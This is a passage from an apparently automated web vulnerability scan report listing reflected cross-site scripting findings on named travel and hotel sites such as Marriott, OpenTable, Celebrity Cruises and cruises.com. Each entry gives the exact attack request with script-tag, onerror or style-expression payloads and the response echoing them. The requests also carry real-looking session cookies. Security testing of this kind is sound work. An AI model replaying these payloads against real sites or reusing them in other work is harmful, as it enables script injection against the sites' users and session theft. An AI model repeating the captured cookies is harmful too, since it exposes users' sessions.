<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/search7734c"><script>alert(1)</script>d1c057d37d7/processSearch.do/1330485593/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.41. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/9110333970@x95 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/search/processSearch.do/9110333970@x95

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97702"><script>alert(1)</script>45113b79497 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/search/processSearch.do97702"><script>alert(1)</script>45113b79497/9110333970@x95?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:24 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 361
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/search/processSearch.do97702"><script>alert(1)</script>45113b79497/792549303/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.42. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/9110333970@x95 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/search/processSearch.do/9110333970@x95

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dc79"><script>alert(1)</script>6e6cfac25c4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/search/processSearch.do/9110333970@x954dc79"><script>alert(1)</script>6e6cfac25c4?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 352
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/search/processSearch.do/71455887/x954dc79"><script>alert(1)</script>6e6cfac25c4/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.43. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/sc/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://marriottinternationa.tt.omtrdc.net
Path:   /m2/marriottinternationa/sc/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 1471a<img%20src%3da%20onerror%3dalert(1)>5431cfedf61 was submitted in the mbox parameter. This input was echoed as 1471a<img src=a onerror=alert(1)>5431cfedf61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /m2/marriottinternationa/sc/standard?mboxHost=www.marriott.com&mboxSession=1317646533235-184575&mboxPage=1317646533235-184575&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=2&mbox=SiteCatalyst%3A%20event1471a<img%20src%3da%20onerror%3dalert(1)>5431cfedf61&mboxId=0&mboxTime=1317628536446&charSet=UTF-8&cookieDomainPeriods=2&pageName=www.marriott.com%2Fdefault.mi&resolution=1920x1200&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkTrackVars=None&linkTrackEvents=None&prop5=US&prop8=Weekday%20%3A%20Monday%20%3A%208%3A30AM&eVar15=Weekday%20%3A%20Monday%20%3A%208%3A30AM&eVar35=First%20Visit&eVar41=US&mboxURL=http%3A%2F%2Fwww.marriott.com%2Fdefault.mi&mboxReferrer=&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: marriottinternationa.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1317646533235-184575; mboxPC=1317646533235-184575.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1317646533235-184575.19; Domain=marriottinternationa.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:57:55 GMT; Path=/m2/marriottinternationa
Content-Length: 264
Date: Mon, 03 Oct 2011 12:57:55 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1317646533235-184575.19");mboxFactories.get('default').get('SiteCatalyst: event1471a<img src=a onerror=alert(1)>5431cfedf61', 0).setOffer(new mboxOfferDefault()).loaded();}

4.44. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/sc/standard [mboxId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://marriottinternationa.tt.omtrdc.net
Path:   /m2/marriottinternationa/sc/standard

Issue detail

The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload 52518<script>alert(1)</script>cbf7a1f30df was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/marriottinternationa/sc/standard?mboxHost=www.marriott.com&mboxSession=1317646533235-184575&mboxPage=1317646533235-184575&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=2&mbox=SiteCatalyst%3A%20event&mboxId=052518<script>alert(1)</script>cbf7a1f30df&mboxTime=1317628536446&charSet=UTF-8&cookieDomainPeriods=2&pageName=www.marriott.com%2Fdefault.mi&resolution=1920x1200&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkTrackVars=None&linkTrackEvents=None&prop5=US&prop8=Weekday%20%3A%20Monday%20%3A%208%3A30AM&eVar15=Weekday%20%3A%20Monday%20%3A%208%3A30AM&eVar35=First%20Visit&eVar41=US&mboxURL=http%3A%2F%2Fwww.marriott.com%2Fdefault.mi&mboxReferrer=&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: marriottinternationa.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1317646533235-184575; mboxPC=1317646533235-184575.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1317646533235-184575.19; Domain=marriottinternationa.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:58:01 GMT; Path=/m2/marriottinternationa
Content-Length: 261
Date: Mon, 03 Oct 2011 12:58:00 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1317646533235-184575.19");mboxFactories.get('default').get('SiteCatalyst: event', 052518<script>alert(1)</script>cbf7a1f30df).setOffer(new mboxOfferDefault()).loaded();}

4.45. http://opentable.tt.omtrdc.net/m2/opentable/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opentable.tt.omtrdc.net
Path:   /m2/opentable/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload f19e2<script>alert(1)</script>0acac75cc3c was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/opentable/mbox/standard?mboxHost=www.opentable.com&mboxSession=1317646507167-573607&mboxPage=1317646507167-573607&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxXDomain=x-only&mboxCount=1&mbox=mboxInterimTrackf19e2<script>alert(1)</script>0acac75cc3c&mboxId=0&mboxTime=1317628507182&mboxURL=http%3A%2F%2Fwww.opentable.com%2Finterim.aspx%3Frid%3D90%26restref%3D90%26m%3D4%26t%3Dsingle%26p%3D2%26d%3D10%2F3%2F2011%25207%3A00%2520PM%26rtype%3Dism_mod&mboxReferrer=http%3A%2F%2Fwww.grandcafe-sf.com%2F&mboxVersion=40 HTTP/1.1
Host: opentable.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1317646507167-573607.19; Domain=opentable.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:56:21 GMT; Path=/m2/opentable
Content-Type: text/javascript
Content-Length: 138
Date: Mon, 03 Oct 2011 12:56:21 GMT
Server: Test & Target

mboxFactories.get('default').get('mboxInterimTrackf19e2<script>alert(1)</script>0acac75cc3c',0).setOffer(new mboxOfferDefault()).loaded();

4.46. http://www.celebritycruises.com/explore/ships/detail.do [tab parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.celebritycruises.com
Path:   /explore/ships/detail.do

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 962db"style%3d"x%3aexpression(alert(1))"eaff2cf540f was submitted in the tab parameter. This input was echoed as 962db"style="x:expression(alert(1))"eaff2cf540f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /explore/ships/detail.do?shipCode=SI&tab=sailings%2Fexplore%2Fships%2Fsailings.do%3Fpagename%3Dship_SI%26shipCode%3DSI962db"style%3d"x%3aexpression(alert(1))"eaff2cf540f&cS=Homepage&ICID=Cel_11Q4_web_hp_body_Silhouette_US HTTP/1.1
Host: www.celebritycruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.celebritycruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027; wuc=USA; s_pers=%20s_evar44cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043868'%255D%255D%7C1475498843868%3B%20s_evar46cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043871'%255D%255D%7C1475498843871%3B; s_sess=%20s_cc%3Dtrue%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3Dcelebritycruiseprod%253D%252526pid%25253Dhomepageus%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.celebritycruises.com%2525252Fexplore%2525252Fships%2525252Fdetail.do%2525253FshipCode%2525253DSI%25252526tab%2525253Dsailings%252525252Fexplore%252525252Fships%252525252%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en
Vary: Accept-Encoding
Content-Length: 75029
Date: Mon, 03 Oct 2011 12:47:32 GMT
Connection: close


   <!DOCTYPE html>
<html>
   <head>
       <meta charset="utf-8">
       
           
                           <title>Celebrity Silhouette | Celebrity Cruises</title>
   <meta property="og:ti
...[SNIP]...
<input type="hidden" name="shipCode" value="SI962db"style="x:expression(alert(1))"eaff2cf540f" id="ccHiddenShipCode" />
...[SNIP]...

4.47. http://www.cruises.com/ajaxjson/filterdynamic.do [changedDdl parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cruises.com
Path:   /ajaxjson/filterdynamic.do

Issue detail

The value of the changedDdl request parameter is copied into the HTML document as plain text between tags. The payload a6397<a%20b%3dc>ad3bf2fc630 was submitted in the changedDdl parameter. This input was echoed as a6397<a b=c>ad3bf2fc630 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajaxjson/filterdynamic.do?wdos=3&d=&d2=&porttype=E&SType=P&ptype=c&type=c&shoppingZipCode=Zip+Code&SType=A&clp=1&sort=7&changedDdl=undefineda6397<a%20b%3dc>ad3bf2fc630 HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/json; charset=utf-8
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.cruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; __utmx=229343950.; __utmxx=229343950.; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.3.9.1317645663627; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:49 GMT
Server: Apache
Set-Cookie: WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; Expires=Thu, 30-Sep-2021 12:42:50 GMT; Path=/
Set-Cookie: IncludeAlumniRates=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: IncludeSeniorRates=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AlumniCruiseId=false; Expires=Wed, 02-Nov-2011 12:42:50 GMT; Path=/
Set-Cookie: shoppingZipCode="Zip Code"; Expires=Wed, 02-Nov-2011 12:42:50 GMT; Path=/
Set-Cookie: EmailSignupComplete=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AFF%5FCID=%22%22; Expires=Wed, 02-Nov-2011 12:42:50 GMT; Path=/
Set-Cookie: sid=6383; Path=/
Content-Length: 6744
Content-Type: application/json;charset=UTF-8
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:44:50 GMT;path=/


{"months":[{"key":"ALL","value":"Any"},{"key":"10/1/2011","value":"October 2011"},{"key":"11/1/2011","value":"November 2011"},{"key":"12/1/2011","value":"December 2011"},{"key":"1/1/2012",
...[SNIP]...
","value":"Silversea Cruises"},{"key":"66","value":"Uniworld River Cruises"},{"key":"78","value":"Viking River Cruises"},{"key":"64","value":"Windstar Cruises","disabled":true}],"changedDdl":"undefineda6397<a b=c>ad3bf2fc630","flexibledays":[{"key":"0","value":"Use this exact date"},{"key":"1","value":"One day before or after"},{"key":"2","value":"3 days before or after"},{"key":"3","value":"7 days before or after"},{"key
...[SNIP]...

4.48. http://www.cruises.com/results.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /results.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 364ac'><script>alert(1)</script>5b3c8877f9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /results.do?searchOrigin=refine&places=ALL&days=ALL&Month=ALL&dd=ALL&d=&d2=&fd=2&c=ALL&v=ALL&p=ALL&shoppingZipCode=10010&IncludeSeniorRates=true&IncludeAlumniRates=true&AlumniCruiseId=44&sort_by=7&Search.x=28&Search.y=17&Search=Search&364ac'><script>alert(1)</script>5b3c8877f9e=1 HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruises.com/promotion/weekend-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; JSESSIONID=12B50B9A092975EDA676566C18A72E04; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; AlumniCruiseId=false; shoppingZipCode="Zip Code"; AFF%5FCID=%22%22; sid=6383; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.13.8.1317645863557; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 13:10:14 GMT
Server: Apache
Set-Cookie: WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D5315e730651e1fd9e5457225; Expires=Thu, 30-Sep-2021 13:10:18 GMT; Path=/
Set-Cookie: IncludeAlumniRates=true; Expires=Wed, 02-Nov-2011 13:10:18 GMT; Path=/
Set-Cookie: IncludeSeniorRates=true; Expires=Wed, 02-Nov-2011 13:10:18 GMT; Path=/
Set-Cookie: AlumniCruiseId=44; Expires=Wed, 02-Nov-2011 13:10:18 GMT; Path=/
Set-Cookie: shoppingZipCode=10010; Expires=Wed, 02-Nov-2011 13:10:18 GMT; Path=/
Set-Cookie: EmailSignupComplete=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AFF%5FCID=%22%22%00a1d04; Expires=Wed, 02-Nov-2011 13:10:18 GMT; Path=/
Set-Cookie: sid=6383; Path=/
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d0e45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 13:12:18 GMT;path=/
Cache-Control: private
Content-Length: 177792


<html>
<head profile="http://www.w3.org/2005/10/profile">


           <META NAME="Description" CONTENT="Find the best cruise and vacation deals on the Internet, make cruise and hote
...[SNIP]...
<a id='next' href='/results.do?days=ALL&dd=ALL&d=&Search.x=28&places=ALL&364ac'><script>alert(1)</script>5b3c8877f9e=1&shoppingZipCode=10010&c=ALL&Search=Search&p=ALL&sort_by=7&d2=&v=ALL&fd=2&Search.y=17&IncludeSeniorRates=true&AlumniCruiseId=44&searchOrigin=refine&Month=ALL&IncludeAlumniRates=true&index=2' class="l
...[SNIP]...

4.49. http://www.cruisesonly.com/ajaxjson/filterdynamic.do [changedDdl parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cruisesonly.com
Path:   /ajaxjson/filterdynamic.do

Issue detail

The value of the changedDdl request parameter is copied into the HTML document as plain text between tags. The payload 138e2<a%20b%3dc>1be29e698d6 was submitted in the changedDdl parameter. This input was echoed as 138e2<a b=c>1be29e698d6 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajaxjson/filterdynamic.do?wdos=3&porttype=E&SType=P&ptype=c&type=c&shoppingZipCode=Zip+Code&SType=A&clp=1&sort=7&changedDdl=undefined138e2<a%20b%3dc>1be29e698d6 HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/json; charset=utf-8
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.2.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:52 GMT
Server: Apache
Set-Cookie: WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; Expires=Thu, 30-Sep-2021 12:42:53 GMT; Path=/
Set-Cookie: IncludeAlumniRates=1c8fe3904be4744e95f12c08; Expires=Wed, 02-Nov-2011 12:42:53 GMT; Path=/
Set-Cookie: IncludeSeniorRates=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AlumniCruiseId=false; Expires=Wed, 02-Nov-2011 12:42:53 GMT; Path=/
Set-Cookie: shoppingZipCode="Zip Code"; Expires=Wed, 02-Nov-2011 12:42:53 GMT; Path=/
Set-Cookie: EmailSignupComplete=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AFF%5FCID=%22%22; Expires=Wed, 02-Nov-2011 12:42:53 GMT; Path=/
Set-Cookie: sid=6386; Path=/
Content-Length: 6744
Content-Type: application/json;charset=UTF-8
Set-Cookie: NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:44:53 GMT;path=/


{"months":[{"key":"ALL","value":"Any"},{"key":"10/1/2011","value":"October 2011"},{"key":"11/1/2011","value":"November 2011"},{"key":"12/1/2011","value":"December 2011"},{"key":"1/1/2012",
...[SNIP]...
","value":"Silversea Cruises"},{"key":"66","value":"Uniworld River Cruises"},{"key":"78","value":"Viking River Cruises"},{"key":"64","value":"Windstar Cruises","disabled":true}],"changedDdl":"undefined138e2<a b=c>1be29e698d6","flexibledays":[{"key":"0","value":"Use this exact date"},{"key":"1","value":"One day before or after"},{"key":"2","value":"3 days before or after"},{"key":"3","value":"7 days before or after"},{"key
...[SNIP]...

4.50. http://www.marriott.com/search/submitSearch.mi [clusterCode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /search/submitSearch.mi

Issue detail

The value of the clusterCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f56e8"><img%20src%3da%20onerror%3dalert(1)>d2f0cc2067a was submitted in the clusterCode parameter. This input was echoed as f56e8"><img src=a onerror=alert(1)>d2f0cc2067a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /search/submitSearch.mi?searchType=InCity&groupCode=&searchRadius=50&recordsPerPage=10&vsMarriottBrands=&destinationAddress.city=bos&destinationAddress.stateProvince=&destinationAddress.country=&fromDate=&minDate=10%2F03%2F2011&maxDate=09%2F23%2F2012&monthNames=January%2CFebruary%2CMarch%2CApril%2CMay%2CJune%2CJuly%2CAugust%2CSeptember%2COctober%2CNovember%2CDecember&weekDays=S%2CM%2CT%2CW%2CT%2CF%2CS&dateFormatPattern=M%2Fd%2Fyy&toDate=&populateTodateFromFromDate=true&defaultToDateDays=1&roomCount=1&guestCount=1&marriottRewardsNumber=&clusterCode=nonef56e8"><img%20src%3da%20onerror%3dalert(1)>d2f0cc2067a&corporateCode=&displayableIncentiveType_Number=&marriottBrands=all HTTP/1.1
Host: www.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
